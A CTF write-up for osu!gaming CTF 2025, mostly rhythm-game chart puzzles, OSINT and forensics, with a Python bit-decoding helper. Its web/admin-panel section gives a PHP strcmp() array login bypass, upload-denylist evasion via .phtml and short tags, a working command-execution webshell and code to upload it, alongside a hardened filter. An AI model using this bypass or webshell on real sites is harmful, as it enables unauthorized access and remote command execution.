osu!gaming CTF 2025 Writeup
Introduction
Long time no write! This time I participated in osu!gaming CTF with team moe 137. I had fun playing this CTF; the challenges were quality, and extra fun if you're a rhythm-game nerd. Here are a few selected writeups from the challenges I helped solve. Thanks to my team for playing with me and thanks to the challenge creators!
rhythm/ksh
We're given a K-Shoot MANIA (an SDVX clone) chart for the song Harumachi Clover, but with no audio files or anything else. A search finds a chart uploaded for the song with half the flag in the description.

After importing the file into KSM, we can see the other half.

rhythm/lunatic-ksm
In this challenge, a KSH file for the song JIR is given, but only for one difficulty. I had trouble opening the chart inside the game directly, so I found the original chart online and compared the two to see if they were really different - and they were!

After some searching, I found that I could view the chart here.

If you read closely, starting at line 171 the chart reads: osu{KONASUTE_IS_A_SCAM}. It's a bit hard to read, but you can infer it because IS A SCAM is easy to read and KONASUTE is an SDVX thing.

rhythm/hidden-signal

We're given a file with maimai chart data for the song QZKAGO REQUIEM. We can take a look at it with MajdataEdit.

If you compare this section with charts online for this particular difficulty, you will find that this section is unique to this challenge's map:

My first thought was that it was supposed to spell out something visually, but after some back and forth, in a last-ditch effort I just transcribed the highs and lows into 1s and 0s and fed them into CyberChef - and then... ?

No way. That was it! I had to play with it a bit to get a clear word after that. A 0 is missing from the string, but once it's added you'll find that the flag is: osu{MAIMAICIRCLE}
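The decode step above can be done without CyberChef, and the "one 0 missing" problem can be handled mechanically by trying every position where a single dropped bit could be re-inserted and keeping the decodes that look like flag text. This is an added example, not the author's CyberChef session: the bit string is constructed (the ASCII of the word from the flag with one 0 deliberately removed) and stands in for the transcription described above; the real note pattern is not reproduced here.

```python
"""Decode a high/low transcription as fixed-width ASCII and repair one dropped bit.

Added example, not part of the original writeup. TRANSCRIBED_BITS is a
constructed input: 12 ASCII bytes with a single '0' removed from the fifth
byte, mimicking a transcription error like the one described above.
"""

# Constructed sample: "MAIMAICIRCLE" in 8-bit ASCII, minus one '0'.
TRANSCRIBED_BITS = (
    "01001101" "01000001" "01001001" "01001101"
    "0100001"            # defect: this byte should be 01000001 ('A')
    "01001001" "01000011" "01001001" "01010010"
    "01000011" "01001100" "01000101"
)


def transcribe(pattern, high="H", low="L"):
    """Map a high/low note transcription such as 'HLLH' to the bit string '1001'.

    Characters other than the two markers (spaces, bar lines) are ignored.
    """
    return "".join("1" if c == high else "0" for c in pattern if c in (high, low))


def bits_to_text(bits, width=8):
    """Decode a bit string as fixed-width ASCII.

    Returns None when the length is not a multiple of `width` (a dropped or
    extra bit) or when any decoded value is not printable ASCII.
    """
    if len(bits) % width:
        return None
    codes = [int(bits[i:i + width], 2) for i in range(0, len(bits), width)]
    if any(not 32 <= c < 127 for c in codes):
        return None
    return "".join(map(chr, codes))


def looks_like_flag_text(text):
    """Heuristic for a usable decode: letters, digits and the osu{...} punctuation only."""
    return all(c.isalnum() or c in "_{}" for c in text)


def repair_missing_bit(bits, width=8):
    """Re-insert one bit at every position and return the plausible decodes.

    Each result is (position, inserted_bit, decoded_text). Inserting inside a
    run of identical bits yields the same text at several positions, so
    callers usually care about the distinct texts.
    """
    candidates = []
    for pos in range(len(bits) + 1):
        for bit in "01":
            text = bits_to_text(bits[:pos] + bit + bits[pos:], width)
            if text and looks_like_flag_text(text):
                candidates.append((pos, bit, text))
    return candidates


def distinct_repairs(bits, width=8):
    """Just the distinct decoded strings from repair_missing_bit()."""
    return sorted({text for _, _, text in repair_missing_bit(bits, width)})


if __name__ == "__main__":
    print("direct decode:", bits_to_text(TRANSCRIBED_BITS))
    print("after single-bit repair:", distinct_repairs(TRANSCRIBED_BITS))
```

If a chart section transcribes to a bit count that is not a multiple of 8, try `width=7` before assuming a dropped bit; 7-bit ASCII is just as common in these puzzles.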
osint/dmca
We need to find the email address of somebody who sent osu! a DMCA notice and misspelled it. You can find a lot of osu! DMCA notices on a gist account, but I actually just stumbled onto the one you need randomly on Twitter.

forensics/map-dealer
We have an .E01 disk image that I'll just open up in FTK Imager.

Inside, you'll find a beatmap containing a fake flag. To find the real flag, open the map in osu!.

web/admin-panel

We have an admin panel that we're able to log in to, but we don't have any credentials.
Looking at the source code, we find this login check:
// Loose comparison: strcmp() returns NULL (not a string) on a non-string
// argument in PHP 7, and NULL == 0 is true.
if ($username == "peppy" && strcmp($admin_password, $password) == 0) {
    $_SESSION["logged_in"] = true;
    header("Location: admin.php");
    exit();
}
There's a lot documented about bypassing strcmp() with type juggling. In PHP 7 and earlier, passing an array where strcmp() expects a string only raises a warning and makes the call return NULL, and NULL == 0 is true under loose comparison, so the check passes without knowing the password (PHP 8 throws a TypeError here instead). We can trigger it by sending the password as an array in the POST body:
username=peppy&password[]=''
After doing this, we see that the admin is able to upload something to the site. In the source code, we notice two checks:

One check to see if the file name ends with .php, and one to see if the file contents contain a PHP snippet. Both are denylists, so they're easy to bypass: extensions such as .phar and .phtml are also handed to the PHP interpreter by a stock Apache PHP configuration, and a webshell written with the `<?=` short echo tag instead of a literal `<?php` slips past the content check. This is the payload I went with.

Then, navigate to uploads and get the flag.
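To make the bypass concrete, here is an offline model of the two upload checks next to the hardened version a reviewer would ask for, plus the request bodies used for the login and upload steps. This is an added example, not code from the challenge or the writeup: the challenge's exact filter isn't shown above, so vulnerable_upload_check() is a reconstruction of the two checks as described, and the form field names, boundary string and allowed extensions are assumptions.

```python
"""Model of the admin-panel upload filter, its bypass, and a hardened replacement.

Added example, not the challenge's own source. vulnerable_upload_check() is an
assumed reconstruction of the two denylist checks the writeup describes;
hardened_upload_check() is the fix. Field names, the multipart boundary and
ALLOWED_EXTENSIONS are assumptions.
"""
import os
import uuid
from urllib.parse import urlencode

# --- the weak filter (reconstruction) ---------------------------------------

def vulnerable_upload_check(filename, content):
    """Return True if the denylist filter would accept the upload."""
    if filename.lower().endswith(".php"):      # check 1: extension denylist
        return False
    if b"<?php" in content:                    # check 2: one specific tag
        return False
    return True


# --- the hardened filter ----------------------------------------------------

# Assumption: the panel only ever needs images and beatmap archives.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".osz"}


def hardened_upload_check(filename, content):
    """Allowlist the extension and reject any PHP open tag, short tags included."""
    # splitext() keeps only the final extension, so "shell.php.png" -> ".png";
    # anything not on the allowlist (.phtml, .phar, .php5, ...) is refused.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    # "<?" covers <?php, <?= and the legacy short tag. Content scanning is a
    # second layer only; the real fix is the allowlist plus serving uploads
    # from a directory where PHP execution is disabled.
    if b"<?" in content:
        return False
    return True


def safe_storage_name(filename):
    """Server-chosen on-disk name: random stem plus an allowlisted extension."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return uuid.uuid4().hex + ext


# --- the payload from the writeup's approach --------------------------------

# .phtml is mapped to the PHP handler by a stock Apache/PHP setup, and the
# <?= echo tag avoids the literal "<?php" the content check looks for.
WEBSHELL_NAME = "shell.phtml"
WEBSHELL_BODY = b"<?= system($_GET['cmd']); ?>"


def build_login_body():
    """POST body for the strcmp() bypass: 'password[]' makes PHP parse an array."""
    return urlencode({"username": "peppy", "password[]": ""})


def build_upload_request(field, filename, content, boundary="osuctfboundary"):
    """Return (Content-Type header value, multipart/form-data body) for the upload."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


if __name__ == "__main__":
    print("login body:", build_login_body())
    print("weak filter accepts webshell:",
          vulnerable_upload_check(WEBSHELL_NAME, WEBSHELL_BODY))
    print("hardened filter accepts webshell:",
          hardened_upload_check(WEBSHELL_NAME, WEBSHELL_BODY))
    ctype, body = build_upload_request("file", WEBSHELL_NAME, WEBSHELL_BODY)
    print(ctype)
    print(body.decode())
```

The login body is sent with Content-Type application/x-www-form-urlencoded; PHP turns the `password%5B%5D=` key back into `password[]` and populates `$_POST['password']` as an array, which is what makes strcmp() misbehave.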
